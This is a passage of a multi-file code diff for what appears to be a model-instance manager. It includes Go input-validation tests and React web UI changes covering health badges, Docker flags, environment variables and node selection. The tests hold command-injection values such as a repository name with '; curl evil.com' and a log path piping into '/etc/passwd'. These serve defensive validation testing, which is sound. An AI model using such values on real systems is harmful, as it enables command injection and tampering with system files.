 					HFRepo: "microsoft/model; curl evil.com",
 				},
@@ -210,9 +205,9 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
 		},
 		{
 			name: "injection in log file",
-			options: &instance.CreateInstanceOptions{
+			options: backends.Options{
 				BackendType: backends.BackendTypeLlamaCpp,
-				LlamaServerOptions: &llamacpp.LlamaServerOptions{
+				LlamaServerOptions: &backends.LlamaServerOptions{
 					Model:   "safe.gguf",
 					LogFile: "/tmp/log.txt | tee /etc/passwd",
 				},
@@ -221,9 +216,9 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
 		},
 		{
 			name: "all safe fields",
-			options: &instance.CreateInstanceOptions{
+			options: backends.Options{
 				BackendType: backends.BackendTypeLlamaCpp,
-				LlamaServerOptions: &llamacpp.LlamaServerOptions{
+				LlamaServerOptions: &backends.LlamaServerOptions{
 					Model:   "/path/to/model.gguf",
 					HFRepo:  "microsoft/DialoGPT-medium",
 					LogFile: "/tmp/llama.log",
@@ -237,7 +232,7 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
-			err := validation.ValidateInstanceOptions(tt.options)
+			err := tt.options.ValidateInstanceOptions()
 			if (err != nil) != tt.wantErr {
 				t.Errorf("ValidateInstanceOptions() error = %v, wantErr %v", err, tt.wantErr)
 			}
@@ -247,12 +242,9 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
 func TestValidateInstanceOptions_NonStringFields(t *testing.T) {
 	// Test that non-string fields don't interfere with validation
-	options := &instance.CreateInstanceOptions{
+	options := backends.Options{
-		AutoRestart:  testutil.BoolPtr(true),
+		BackendType: backends.BackendTypeLlamaCpp,
-		MaxRestarts:  testutil.IntPtr(5),
+		LlamaServerOptions: &backends.LlamaServerOptions{
 		RestartDelay: testutil.IntPtr(10),
 		BackendType:  backends.BackendTypeLlamaCpp,
 		LlamaServerOptions: &llamacpp.LlamaServerOptions{
 			Port:        8080,
 			GPULayers:   32,
 			CtxSize:     4096,
@@ -264,7 +256,7 @@ func TestValidateInstanceOptions_NonStringFields(t *testing.T) {
 		},
 	}
-	err := validation.ValidateInstanceOptions(options)
+	err := options.ValidateInstanceOptions()
 	if err != nil {
 		t.Errorf("ValidateInstanceOptions with non-string fields should not error, got: %v", err)
 	}
--- a/webui/package-lock.json
+++ b/webui/package-lock.json
@@ -43,7 +43,7 @@
        "tw-animate-css": "^1.3.5",
        "typescript": "^5.8.3",
        "typescript-eslint": "^8.38.0",
-        "vite": "^7.1.5",
+        "vite": "^7.1.11",
        "vitest": "^3.2.4"
      }
    },
@@ -7424,9 +7424,9 @@
      }
    },
    "node_modules/vite": {
-      "version": "7.1.5",
+      "version": "7.1.11",
-      "resolved": "https://registry.npmjs.org/vite/-/vite-7.1.5.tgz",
+      "resolved": "https://registry.npmjs.org/vite/-/vite-7.1.11.tgz",
-      "integrity": "sha512-4cKBO9wR75r0BeIWWWId9XK9Lj6La5X846Zw9dFfzMRw38IlTk2iCcUt6hsyiDRcPidc55ZParFYDXi0nXOeLQ==",
+      "integrity": "sha512-uzcxnSDVjAopEUjljkWh8EIrg6tlzrjFUfMcR1EVsRDGwf/ccef0qQPRyOrROwhrTDaApueq+ja+KLPlzR/zdg==",
      "license": "MIT",
      "dependencies": {
        "esbuild": "^0.25.0",
--- a/webui/package.json
+++ b/webui/package.json
@@ -52,7 +52,7 @@
    "tw-animate-css": "^1.3.5",
    "typescript": "^5.8.3",
    "typescript-eslint": "^8.38.0",
-    "vite": "^7.1.5",
+    "vite": "^7.1.11",
    "vitest": "^3.2.4"
  }
 }
--- a/webui/src/tests/App.test.tsx
+++ b/webui/src/tests/App.test.tsx
@@ -12,12 +12,14 @@ import { AuthProvider } from '@/contexts/AuthContext'
 vi.mock('@/lib/api', () => ({
  instancesApi: {
    list: vi.fn(),
    get: vi.fn(),
    create: vi.fn(),
    update: vi.fn(),
    start: vi.fn(),
    stop: vi.fn(),
    restart: vi.fn(),
    delete: vi.fn(),
    getHealth: vi.fn(),
  },
  serverApi: {
    getHelp: vi.fn(),
@@ -30,9 +32,21 @@ vi.mock('@/lib/api', () => ({
 vi.mock('@/lib/healthService', () => ({
  healthService: {
    subscribe: vi.fn(() => () => {}),
-    checkHealth: vi.fn(),
+    refreshHealth: vi.fn(() => Promise.resolve()),
    checkHealthAfterOperation: vi.fn(),
    performHealthCheck: vi.fn(() => Promise.resolve({
      state: 'ready',
      instanceStatus: 'running',
      lastChecked: new Date(),
      source: 'http'
    })),
  },
-  checkHealth: vi.fn(),
+  checkHealth: vi.fn(() => Promise.resolve({
    state: 'ready',
    instanceStatus: 'running',
    lastChecked: new Date(),
    source: 'http'
  })),
 }))
 function renderApp() {
--- a/webui/src/components/BackendBadge.tsx
+++ b/webui/src/components/BackendBadge.tsx
@@ -1,13 +1,14 @@
 import React from "react";
 import { Badge } from "@/components/ui/badge";
 import { BackendType, type BackendTypeValue } from "@/types/instance";
-import { Server } from "lucide-react";
+import { Server, Package } from "lucide-react";
 interface BackendBadgeProps {
  backend?: BackendTypeValue;
  docker?: boolean;
 }
-const BackendBadge: React.FC<BackendBadgeProps> = ({ backend }) => {
+const BackendBadge: React.FC<BackendBadgeProps> = ({ backend, docker }) => {
  if (!backend) {
    return null;
  }
@@ -39,13 +40,25 @@ const BackendBadge: React.FC<BackendBadgeProps> = ({ backend }) => {
  };
  return (
-    <Badge
+    <div className="flex items-center gap-1">
-      variant="outline"
+      <Badge
-      className={`flex items-center gap-1.5 ${getColorClasses()}`}
+        variant="outline"
-    >
+        className={`flex items-center gap-1.5 ${getColorClasses()}`}
-      <Server className="h-3 w-3" />
+      >
-      <span className="text-xs">{getText()}</span>
+        <Server className="h-3 w-3" />
-    </Badge>
+        <span className="text-xs">{getText()}</span>
      </Badge>
      {docker && (
        <Badge
          variant="outline"
          className="flex items-center gap-1.5 bg-orange-100 text-orange-800 border-orange-200 dark:bg-orange-900 dark:text-orange-200 dark:border-orange-800"
          title="Docker enabled"
        >
          <Package className="h-3 w-3" />
          <span className="text-[10px] uppercase tracking-wide">Docker</span>
        </Badge>
      )}
    </div>
  );
 };
--- a/webui/src/components/HealthBadge.tsx
+++ b/webui/src/components/HealthBadge.tsx
@@ -2,7 +2,7 @@
 import React from "react";
 import { Badge } from "@/components/ui/badge";
 import type { HealthStatus } from "@/types/instance";
-import { CheckCircle, Loader2, XCircle } from "lucide-react";
+import { CheckCircle, Loader2, XCircle, Clock } from "lucide-react";
 interface HealthBadgeProps {
  health?: HealthStatus;
@@ -10,37 +10,33 @@ interface HealthBadgeProps {
 const HealthBadge: React.FC<HealthBadgeProps> = ({ health }) => {
  if (!health) {
-    health = {
+    return null;
      status: "unknown", // Default to unknown if not provided
      lastChecked: new Date(), // Default to current date
      message: undefined, // No message by default
    };
  }
  const getIcon = () => {
-    switch (health.status) {
+    switch (health.state) {
-      case "ok":
+      case "ready":
        return <CheckCircle className="h-3 w-3" />;
-      case "loading":
+      case "starting":
        return <Loader2 className="h-3 w-3 animate-spin" />;
-      case "error":
+      case "restarting":
        return <XCircle className="h-3 w-3" />;
      case "unknown":
        return <Loader2 className="h-3 w-3 animate-spin" />;
      case "stopped":
        return <Clock className="h-3 w-3" />;
      case "failed":
        return <XCircle className="h-3 w-3" />;
    }
  };
  const getVariant = () => {
-    switch (health.status) {
+    switch (health.state) {
-      case "ok":
+      case "ready":
        return "default";
-      case "loading":
+      case "starting":
        return "outline";
-      case "error":
+      case "restarting":
-        return "destructive";
+        return "outline";
-      case "unknown":
+      case "stopped":
        return "secondary";
      case "failed":
        return "destructive";
@@ -48,15 +44,15 @@ const HealthBadge: React.FC<HealthBadgeProps> = ({ health }) => {
  };
  const getText = () => {
-    switch (health.status) {
+    switch (health.state) {
-      case "ok":
+      case "ready":
        return "Ready";
-      case "loading":
+      case "starting":
-        return "Loading";
+        return "Starting";
-      case "error":
+      case "restarting":
-        return "Error";
+        return "Restarting";
-      case "unknown":
+      case "stopped":
-        return "Unknown";
+        return "Stopped";
      case "failed":
        return "Failed";
    }
@@ -66,10 +62,11 @@ const HealthBadge: React.FC<HealthBadgeProps> = ({ health }) => {
    <Badge
      variant={getVariant()}
      className={`flex items-center gap-1.5 ${
-        health.status === "ok"
+        health.state === "ready"
          ? "bg-green-100 text-green-800 border-green-200 dark:bg-green-900 dark:text-green-200 dark:border-green-800"
          : ""
      }`}
      title={health.error || `Source: ${health.source}`}
    >
      {getIcon()}
      <span className="text-xs">{getText()}</span>
--- a/webui/src/components/InstanceCard.tsx
+++ b/webui/src/components/InstanceCard.tsx
@@ -66,7 +66,7 @@ function InstanceCard({
            {/* Badges row */}
            <div className="flex items-center gap-2 flex-wrap">
-              <BackendBadge backend={instance.options?.backend_type} />
+              <BackendBadge backend={instance.options?.backend_type} docker={instance.docker_enabled} />
              {running && <HealthBadge health={health} />}
            </div>
          </div>
--- a/webui/src/components/InstanceDialog.tsx
+++ b/webui/src/components/InstanceDialog.tsx
@@ -106,7 +106,7 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
    // Clean up undefined values to avoid sending empty fields
    const cleanOptions: CreateInstanceOptions = {};
    Object.entries(formData).forEach(([key, value]) => {
-      if (key === 'backend_options' && value && typeof value === 'object') {
+      if (key === 'backend_options' && value && typeof value === 'object' && !Array.isArray(value)) {
        // Handle backend_options specially - clean nested object
        const cleanBackendOptions: any = {};
        Object.entries(value).forEach(([backendKey, backendValue]) => {
@@ -118,13 +118,17 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
            cleanBackendOptions[backendKey] = backendValue;
          }
        });
-        
+
        // Only include backend_options if it has content
        if (Object.keys(cleanBackendOptions).length > 0) {
          (cleanOptions as any)[key] = cleanBackendOptions;
        }
-      } else if (value !== undefined && value !== null && (typeof value !== 'string' || value.trim() !== "")) {
+      } else if (value !== undefined && value !== null) {
-        // Handle arrays - don't include empty arrays
+        // Skip empty strings
        if (typeof value === 'string' && value.trim() === "") {
          return;
        }
        // Skip empty arrays
        if (Array.isArray(value) && value.length === 0) {
          return;
        }
--- a/webui/src/components/ZodFormField.tsx
+++ b/webui/src/components/ZodFormField.tsx
@@ -1,144 +0,0 @@
 import React from 'react'
 import { Input } from '@/components/ui/input'
 import { Label } from '@/components/ui/label'
 import { Checkbox } from '@/components/ui/checkbox'
 import { BackendType, type CreateInstanceOptions } from '@/types/instance'
 import { getFieldType, basicFieldsConfig } from '@/lib/zodFormUtils'
 interface ZodFormFieldProps {
  fieldKey: keyof CreateInstanceOptions
  value: string | number | boolean | string[] | undefined
  onChange: (key: keyof CreateInstanceOptions, value: string | number | boolean | string[] | undefined) => void
 }
 const ZodFormField: React.FC<ZodFormFieldProps> = ({ fieldKey, value, onChange }) => {
  // Get configuration for basic fields, or use field name for advanced fields
  const config = basicFieldsConfig[fieldKey as string] || { label: fieldKey }
  // Get type from Zod schema
  const fieldType = getFieldType(fieldKey)
  const handleChange = (newValue: string | number | boolean | string[] | undefined) => {
    onChange(fieldKey, newValue)
  }
  const renderField = () => {
    // Special handling for backend_type field - render as dropdown
    if (fieldKey === 'backend_type') {
      return (
        <div className="grid gap-2">
          <Label htmlFor={fieldKey}>
            {config.label}
          </Label>
          <select
            id={fieldKey}
            value={typeof value === 'string' ? value : BackendType.LLAMA_CPP}
            onChange={(e) => handleChange(e.target.value || undefined)}
            className="flex h-10 w-full rounded-md border border-input bg-background px-3 py-2 text-sm ring-offset-background file:border-0 file:bg-transparent file:text-sm file:font-medium placeholder:text-muted-foreground focus-visible:outline-none focus-visible:ring-2 focus-visible:ring-ring focus-visible:ring-offset-2 disabled:cursor-not-allowed disabled:opacity-50"
          >
            <option value={BackendType.LLAMA_CPP}>Llama Server</option>
            <option value={BackendType.MLX_LM}>MLX LM</option>
            <option value={BackendType.VLLM}>vLLM</option>
          </select>
          {config.description && (
            <p className="text-sm text-muted-foreground">{config.description}</p>
          )}
        </div>
      )
    }
    switch (fieldType) {
      case 'boolean':
        return (
          <div className="flex items-center space-x-2">
            <Checkbox
              id={fieldKey}
              checked={typeof value === 'boolean' ? value : false}
              onCheckedChange={(checked) => handleChange(checked)}
            />
            <Label htmlFor={fieldKey} className="text-sm font-normal">
              {config.label}
              {config.description && (
                <span className="text-muted-foreground ml-1">- {config.description}</span>
              )}
            </Label>
          </div>
        )
      case 'number':
        return (
          <div className="grid gap-2">
            <Label htmlFor={fieldKey}>
              {config.label}
              </Label>
            <Input
              id={fieldKey}
              type="number"
              step="any" // This allows decimal numbers
              value={typeof value === 'string' || typeof value === 'number' ? value : ''}
              onChange={(e) => {
                const numValue = e.target.value ? parseFloat(e.target.value) : undefined
                // Only update if the parsed value is valid or the input is empty
                if (e.target.value === '' || (numValue !== undefined && !isNaN(numValue))) {
                  handleChange(numValue)
                }
              }}
              placeholder={config.placeholder}
            />
            {config.description && (
              <p className="text-sm text-muted-foreground">{config.description}</p>
            )}
          </div>
        )
      case 'array':
        return (
          <div className="grid gap-2">
            <Label htmlFor={fieldKey}>
              {config.label}
              </Label>
            <Input
              id={fieldKey}
              type="text"
              value={Array.isArray(value) ? value.join(', ') : ''}
              onChange={(e) => {
                const arrayValue = e.target.value 
                  ? e.target.value.split(',').map(s => s.trim()).filter(Boolean)
                  : undefined
                handleChange(arrayValue)
              }}
              placeholder="item1, item2, item3"
            />
            {config.description && (
              <p className="text-sm text-muted-foreground">{config.description}</p>
            )}
            <p className="text-xs text-muted-foreground">Separate multiple values with commas</p>
          </div>
        )
      case 'text':
      default:
        return (
          <div className="grid gap-2">
            <Label htmlFor={fieldKey}>
              {config.label}
              </Label>
            <Input
              id={fieldKey}
              type="text"
              value={typeof value === 'string' || typeof value === 'number' ? value : ''}
              onChange={(e) => handleChange(e.target.value || undefined)}
              placeholder={config.placeholder}
            />
            {config.description && (
              <p className="text-sm text-muted-foreground">{config.description}</p>
            )}
          </div>
        )
    }
  }
  return <div className="space-y-2">{renderField()}</div>
 }
 export default ZodFormField
--- a/webui/src/components/tests/InstanceCard.test.tsx
+++ b/webui/src/components/tests/InstanceCard.test.tsx
@@ -2,12 +2,16 @@ import { describe, it, expect, vi, beforeEach, afterEach } from 'vitest'
 import { render, screen } from '@testing-library/react'
 import userEvent from '@testing-library/user-event'
 import InstanceCard from '@/components/InstanceCard'
-import type { Instance } from '@/types/instance'
+import { type Instance, BackendType } from '@/types/instance'
 import { BackendType } from '@/types/instance'
 // Mock the health hook since we're not testing health logic here
 vi.mock('@/hooks/useInstanceHealth', () => ({
-  useInstanceHealth: vi.fn(() => ({ status: 'ok', lastChecked: new Date() }))
+  useInstanceHealth: vi.fn(() => ({
    state: 'ready',
    instanceStatus: 'running',
    lastChecked: new Date(),
    source: 'http'
  }))
 }))
 describe('InstanceCard - Instance Actions and State', () => {
--- a/webui/src/components/tests/InstanceList.test.tsx
+++ b/webui/src/components/tests/InstanceList.test.tsx
@@ -12,12 +12,14 @@ import { AuthProvider } from '@/contexts/AuthContext'
 vi.mock('@/lib/api', () => ({
  instancesApi: {
    list: vi.fn(),
    get: vi.fn(),
    create: vi.fn(),
    update: vi.fn(),
    start: vi.fn(),
    stop: vi.fn(),
    restart: vi.fn(),
    delete: vi.fn(),
    getHealth: vi.fn(),
  }
 }))
@@ -25,9 +27,21 @@ vi.mock('@/lib/api', () => ({
 vi.mock('@/lib/healthService', () => ({
  healthService: {
    subscribe: vi.fn(() => () => {}),
-    checkHealth: vi.fn(),
+    refreshHealth: vi.fn(() => Promise.resolve()),
    checkHealthAfterOperation: vi.fn(),
    performHealthCheck: vi.fn(() => Promise.resolve({
      state: 'ready',
      instanceStatus: 'running',
      lastChecked: new Date(),
      source: 'http'
    })),
  },
-  checkHealth: vi.fn(),
+  checkHealth: vi.fn(() => Promise.resolve({
    state: 'ready',
    instanceStatus: 'running',
    lastChecked: new Date(),
    source: 'http'
  })),
 }))
 function renderInstanceList(editInstance = vi.fn()) {
--- a/webui/src/components/form/EnvironmentVariablesInput.tsx
+++ b/webui/src/components/form/EnvironmentVariablesInput.tsx
@@ -0,0 +1,144 @@
 import React, { useState } from 'react'
 import { Input } from '@/components/ui/input'
 import { Label } from '@/components/ui/label'
 import { Button } from '@/components/ui/button'
 import { X, Plus } from 'lucide-react'
 interface EnvironmentVariablesInputProps {
  id: string
  label: string
  value: Record<string, string> | undefined
  onChange: (value: Record<string, string> | undefined) => void
  description?: string
  disabled?: boolean
  className?: string
 }
 interface EnvVar {
  key: string
  value: string
 }
 const EnvironmentVariablesInput: React.FC<EnvironmentVariablesInputProps> = ({
  id,
  label,
  value,
  onChange,
  description,
  disabled = false,
  className
 }) => {
  // Convert the value object to an array of key-value pairs for editing
  const envVarsFromValue = value
    ? Object.entries(value).map(([key, val]) => ({ key, value: val }))
    : []
  const [envVars, setEnvVars] = useState<EnvVar[]>(
    envVarsFromValue.length > 0 ? envVarsFromValue : [{ key: '', value: '' }]
  )
  // Update parent component when env vars change
  const updateParent = (newEnvVars: EnvVar[]) => {
    // Filter out empty entries
    const validVars = newEnvVars.filter(env => env.key.trim() !== '' && env.value.trim() !== '')
    if (validVars.length === 0) {
      onChange(undefined)
    } else {
      const envObject = validVars.reduce((acc, env) => {
        acc[env.key.trim()] = env.value.trim()
        return acc
      }, {} as Record<string, string>)
      onChange(envObject)
    }
  }
  const handleKeyChange = (index: number, newKey: string) => {
    const newEnvVars = [...envVars]
    newEnvVars[index].key = newKey
    setEnvVars(newEnvVars)
    updateParent(newEnvVars)
  }
  const handleValueChange = (index: number, newValue: string) => {
    const newEnvVars = [...envVars]
    newEnvVars[index].value = newValue
    setEnvVars(newEnvVars)
    updateParent(newEnvVars)
  }
  const addEnvVar = () => {
    const newEnvVars = [...envVars, { key: '', value: '' }]
    setEnvVars(newEnvVars)
  }
  const removeEnvVar = (index: number) => {
    if (envVars.length === 1) {
      // Reset to empty if it's the last one
      const newEnvVars = [{ key: '', value: '' }]
      setEnvVars(newEnvVars)
      updateParent(newEnvVars)
    } else {
      const newEnvVars = envVars.filter((_, i) => i !== index)
      setEnvVars(newEnvVars)
      updateParent(newEnvVars)
    }
  }
  return (
    <div className={`grid gap-2 ${className || ''}`}>
      <Label htmlFor={id}>
        {label}
      </Label>
      <div className="space-y-2">
        {envVars.map((envVar, index) => (
          <div key={index} className="flex gap-2 items-center">
            <Input
              placeholder="Variable name"
              value={envVar.key}
              onChange={(e) => handleKeyChange(index, e.target.value)}
              disabled={disabled}
              className="flex-1"
            />
            <Input
              placeholder="Variable value"
              value={envVar.value}
              onChange={(e) => handleValueChange(index, e.target.value)}
              disabled={disabled}
              className="flex-1"
            />
            <Button
              type="button"
              variant="outline"
              size="sm"
              onClick={() => removeEnvVar(index)}
              disabled={disabled}
              className="shrink-0"
            >
              <X className="h-4 w-4" />
            </Button>
          </div>
        ))}
        <Button
          type="button"
          variant="outline"
          size="sm"
          onClick={addEnvVar}
          disabled={disabled}
          className="w-fit"
        >
          <Plus className="h-4 w-4 mr-2" />
          Add Variable
        </Button>
      </div>
      {description && (
        <p className="text-sm text-muted-foreground">{description}</p>
      )}
      <p className="text-xs text-muted-foreground">
        Environment variables that will be passed to the backend process
      </p>
    </div>
  )
 }
 export default EnvironmentVariablesInput
--- a/webui/src/components/instance/BasicInstanceFields.tsx
+++ b/webui/src/components/instance/BasicInstanceFields.tsx
@@ -1,99 +0,0 @@
 import React from 'react'
 import { BackendType, type CreateInstanceOptions } from '@/types/instance'
 import { getBasicFields, basicFieldsConfig } from '@/lib/zodFormUtils'
 import { getFieldType } from '@/schemas/instanceOptions'
 import TextInput from '@/components/form/TextInput'
 import NumberInput from '@/components/form/NumberInput'
 import CheckboxInput from '@/components/form/CheckboxInput'
 import SelectInput from '@/components/form/SelectInput'
 interface BasicInstanceFieldsProps {
  formData: CreateInstanceOptions
  onChange: (key: keyof CreateInstanceOptions, value: any) => void
 }
 const BasicInstanceFields: React.FC<BasicInstanceFieldsProps> = ({
  formData,
  onChange
 }) => {
  const basicFields = getBasicFields()
  const renderField = (fieldKey: keyof CreateInstanceOptions) => {
    const config = basicFieldsConfig[fieldKey as string] || { label: fieldKey }
    const fieldType = getFieldType(fieldKey)
    // Special handling for backend_type field
    if (fieldKey === 'backend_type') {
      return (
        <SelectInput
          key={fieldKey}
          id={fieldKey}
          label={config.label}
          value={formData[fieldKey] || BackendType.LLAMA_CPP}
          onChange={(value) => onChange(fieldKey, value)}
          options={[
            { value: BackendType.LLAMA_CPP, label: 'Llama Server' },
            { value: BackendType.MLX_LM, label: 'MLX LM' },
            { value: BackendType.VLLM, label: 'vLLM' }
          ]}
          description={config.description}
        />
      )
    }
    // Render based on field type
    switch (fieldType) {
      case 'boolean':
        return (
          <CheckboxInput
            key={fieldKey}
            id={fieldKey}
            label={config.label}
            value={formData[fieldKey] as boolean | undefined}
            onChange={(value) => onChange(fieldKey, value)}
            description={config.description}
          />
        )
      case 'number':
        return (
          <NumberInput
            key={fieldKey}
            id={fieldKey}
            label={config.label}
            value={formData[fieldKey] as number | undefined}
            onChange={(value) => onChange(fieldKey, value)}
            placeholder={config.placeholder}
            description={config.description}
          />
        )
      default:
        return (
          <TextInput
            key={fieldKey}
            id={fieldKey}
            label={config.label}
            value={formData[fieldKey] as string | number | undefined}
            onChange={(value) => onChange(fieldKey, value)}
            placeholder={config.placeholder}
            description={config.description}
          />
        )
    }
  }
  // Filter out auto restart fields and backend_options (handled separately)
  const fieldsToRender = basicFields.filter(
    fieldKey => !['auto_restart', 'max_restarts', 'restart_delay', 'backend_options'].includes(fieldKey as string)
  )
  return (
    <div className="space-y-4">
      <h3 className="text-lg font-medium">Basic Configuration</h3>
      {fieldsToRender.map(renderField)}
    </div>
  )
 }
 export default BasicInstanceFields
--- a/webui/src/components/instance/InstanceSettingsCard.tsx
+++ b/webui/src/components/instance/InstanceSettingsCard.tsx
@@ -1,4 +1,4 @@
-import React from 'react'
+import React, { useState, useEffect } from 'react'
 import type { CreateInstanceOptions } from '@/types/instance'
 import { Card, CardContent, CardHeader, CardTitle } from '@/components/ui/card'
 import { Label } from '@/components/ui/label'
@@ -6,6 +6,9 @@ import { Input } from '@/components/ui/input'
 import AutoRestartConfiguration from '@/components/instance/AutoRestartConfiguration'
 import NumberInput from '@/components/form/NumberInput'
 import CheckboxInput from '@/components/form/CheckboxInput'
 import EnvironmentVariablesInput from '@/components/form/EnvironmentVariablesInput'
 import SelectInput from '@/components/form/SelectInput'
 import { nodesApi, type NodesMap } from '@/lib/api'
 interface InstanceSettingsCardProps {
  instanceName: string
@@ -24,6 +27,46 @@ const InstanceSettingsCard: React.FC<InstanceSettingsCardProps> = ({
  onNameChange,
  onChange
 }) => {
  const [nodes, setNodes] = useState<NodesMap>({})
  const [loadingNodes, setLoadingNodes] = useState(true)
  useEffect(() => {
    const fetchNodes = async () => {
      try {
        const fetchedNodes = await nodesApi.list()
        setNodes(fetchedNodes)
        // Auto-select first node if none selected
        const nodeNames = Object.keys(fetchedNodes)
        if (nodeNames.length > 0 && (!formData.nodes || formData.nodes.length === 0)) {
          onChange('nodes', [nodeNames[0]])
        }
      } catch (error) {
        console.error('Failed to fetch nodes:', error)
      } finally {
        setLoadingNodes(false)
      }
    }
    void fetchNodes()
    // eslint-disable-next-line react-hooks/exhaustive-deps
  }, [])
  const nodeOptions = Object.keys(nodes).map(nodeName => ({
    value: nodeName,
    label: nodeName
  }))
  const handleNodeChange = (value: string | undefined) => {
    if (value) {
      onChange('nodes', [value])
    } else {
      onChange('nodes', undefined)
    }
  }
  const selectedNode = formData.nodes && formData.nodes.length > 0 ? formData.nodes[0] : ''
  return (
    <Card>
      <CardHeader>
@@ -49,6 +92,19 @@ const InstanceSettingsCard: React.FC<InstanceSettingsCardProps> = ({
          </p>
        </div>
        {/* Node Selection */}
        {!loadingNodes && Object.keys(nodes).length > 0 && (
          <SelectInput
            id="node"
            label="Node"
            value={selectedNode}
            onChange={handleNodeChange}
            options={nodeOptions}
            description={isEditing ? "Node cannot be changed after instance creation" : "Select the node where the instance will run"}
            disabled={isEditing}
          />
        )}
        {/* Auto Restart Configuration */}
        <AutoRestartConfiguration
          formData={formData}
@@ -75,6 +131,14 @@ const InstanceSettingsCard: React.FC<InstanceSettingsCardProps> = ({
            onChange={(value) => onChange('on_demand_start', value)}
            description="Start instance only when needed"
          />
          <EnvironmentVariablesInput
            id="environment"
            label="Environment Variables"
            value={formData.environment}
            onChange={(value) => onChange('environment', value)}
            description="Custom environment variables for the instance"
          />
        </div>
      </CardContent>
    </Card>
--- a/webui/src/contexts/AuthContext.tsx
+++ b/webui/src/contexts/AuthContext.tsx
@@ -1,4 +1,4 @@
-import { type ReactNode, createContext, useContext, useState, useEffect, useCallback } from 'react'
+import { type ReactNode, createContext, useCallback, useContext, useEffect, useState } from 'react'
 interface AuthContextState {
  isAuthenticated: boolean
@@ -62,7 +62,7 @@ export const AuthProvider = ({ children }: AuthProviderProps) => {
  // Validate API key by making a test request
  const validateApiKey = async (key: string): Promise<boolean> => {
    try {
-      const response = await fetch('/api/v1/instances', {
+      const response = await fetch(document.baseURI + 'api/v1/instances', {
        headers: {
          'Authorization': `Bearer ${key}`,
          'Content-Type': 'application/json'
--- a/webui/src/contexts/InstancesContext.tsx
+++ b/webui/src/contexts/InstancesContext.tsx
@@ -2,6 +2,7 @@ import { type ReactNode, createContext, useContext, useState, useEffect, useCall
 import type { CreateInstanceOptions, Instance } from '@/types/instance'
 import { instancesApi } from '@/lib/api'
 import { useAuth } from '@/contexts/AuthContext'
 import { healthService } from '@/lib/healthService'
 interface InstancesContextState {
  instances: Instance[]
@@ -115,6 +116,9 @@ export const InstancesProvider = ({ children }: InstancesProviderProps) => {
      // Update only this instance's status
      updateInstanceInMap(name, { status: "running" })
      // Trigger health check after starting
      healthService.checkHealthAfterOperation(name, 'start')
    } catch (err) {
      setError(err instanceof Error ? err.message : 'Failed to start instance')
    }
@@ -127,6 +131,9 @@ export const InstancesProvider = ({ children }: InstancesProviderProps) => {
      // Update only this instance's status
      updateInstanceInMap(name, { status: "stopped" })
      // Trigger health check after stopping
      healthService.checkHealthAfterOperation(name, 'stop')
    } catch (err) {
      setError(err instanceof Error ? err.message : 'Failed to stop instance')
    }
@@ -139,6 +146,9 @@ export const InstancesProvider = ({ children }: InstancesProviderProps) => {
      // Update only this instance's status
      updateInstanceInMap(name, { status: "running" })
      // Trigger health check after restarting
      healthService.checkHealthAfterOperation(name, 'restart')
    } catch (err) {
      setError(err instanceof Error ? err.message : 'Failed to restart instance')
    }
--- a/webui/src/contexts/tests/InstancesContext.test.tsx
+++ b/webui/src/contexts/tests/InstancesContext.test.tsx
@@ -11,15 +11,38 @@ import { AuthProvider } from "../AuthContext";
 vi.mock("@/lib/api", () => ({
  instancesApi: {
    list: vi.fn(),
    get: vi.fn(),
    create: vi.fn(),
    update: vi.fn(),
    start: vi.fn(),
    stop: vi.fn(),
    restart: vi.fn(),
    delete: vi.fn(),
    getHealth: vi.fn(),
  },
 }));
 // Mock health service
 vi.mock("@/lib/healthService", () => ({
  healthService: {
    subscribe: vi.fn(() => () => {}),
    refreshHealth: vi.fn(() => Promise.resolve()),
    checkHealthAfterOperation: vi.fn(),
    performHealthCheck: vi.fn(() => Promise.resolve({
      state: 'ready',
      instanceStatus: 'running',
      lastChecked: new Date(),
      source: 'http'
    })),
  },
  checkHealth: vi.fn(() => Promise.resolve({
    state: 'ready',
    instanceStatus: 'running',
    lastChecked: new Date(),
    source: 'http'
  })),
 }));
 // Test component to access context
 function TestComponent() {
  const {
--- a/webui/src/hooks/useInstanceHealth.ts
+++ b/webui/src/hooks/useInstanceHealth.ts
@@ -7,24 +7,23 @@ export function useInstanceHealth(instanceName: string, instanceStatus: Instance
  const [health, setHealth] = useState<HealthStatus | undefined>()
  useEffect(() => {
    if (instanceStatus === "stopped") {
      setHealth({ status: "unknown", lastChecked: new Date() })
      return
    }
    if (instanceStatus === "failed") {
      setHealth({ status: instanceStatus, lastChecked: new Date() })
      return
    }
    // Subscribe to health updates for this instance
    const unsubscribe = healthService.subscribe(instanceName, (healthStatus) => {
      setHealth(healthStatus)
    })
-    // Cleanup subscription on unmount or when instanceStatus changes
+    // Cleanup subscription on unmount or when instance changes
    return unsubscribe
  }, [instanceName])
  // Trigger health check when instance status changes to active states
  useEffect(() => {
    if (instanceStatus === 'running' || instanceStatus === 'restarting') {
      healthService.refreshHealth(instanceName).catch(error => {
        console.error(`Failed to refresh health for ${instanceName}:`, error)
      })
    }
  }, [instanceName, instanceStatus])
  return health
-}
+}
--- a/webui/src/lib/tests/api.test.ts
+++ b/webui/src/lib/tests/api.test.ts
@@ -1,5 +1,5 @@
 import { describe, it, expect, vi, beforeEach } from 'vitest'
 import { instancesApi } from '@/lib/api'
 import { beforeEach, describe, expect, it, vi } from 'vitest'
 // Mock fetch globally
 const mockFetch = vi.fn()
@@ -11,11 +11,13 @@ describe('API Error Handling', () => {
  })
  it('converts HTTP errors to meaningful messages', async () => {
-    mockFetch.mockResolvedValue({
+    const mockResponse = {
      ok: false,
      status: 409,
-      text: () => Promise.resolve('Instance already exists')
+      text: () => Promise.resolve('Instance already exists'),
-    })
+      clone: function() { return this }
    }
    mockFetch.mockResolvedValue(mockResponse)
    await expect(instancesApi.create('existing', {}))
      .rejects
@@ -23,11 +25,13 @@ describe('API Error Handling', () => {
  })
  it('handles empty error responses gracefully', async () => {
-    mockFetch.mockResolvedValue({
+    const mockResponse = {
      ok: false,
      status: 500,
-      text: () => Promise.resolve('')
+      text: () => Promise.resolve(''),
-    })
+      clone: function() { return this }
    }
    mockFetch.mockResolvedValue(mockResponse)
    await expect(instancesApi.list())
      .rejects
